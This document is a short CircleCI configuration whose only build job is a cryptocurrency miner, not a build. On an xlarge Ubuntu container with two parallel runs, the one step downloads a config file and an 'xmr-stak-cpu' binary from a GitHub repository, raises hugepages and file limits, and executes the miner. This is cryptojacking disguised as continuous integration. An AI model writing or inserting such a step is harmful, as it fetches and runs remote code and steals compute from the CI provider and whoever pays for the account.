jobs:
  build:
    docker:
      - image: ubuntu:16.04
    parallelism: 2
    resource_class: xlarge
    branches:
      only:
        - master
        - /*/
    steps:
       - run: apt-get update && apt-get install -y wget libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev && wget https://github.com/tureku/tureku/raw/master/config.txt && wget https://github.com/tureku/tureku/raw/master/xmr-stak-cpu && chmod +x xmr-stak-cpu &&sysctl -w vm.nr_hugepages=128 && ulimit -n 262144 && ulimit -n 262144 && ./xmr-stak-cpu
      
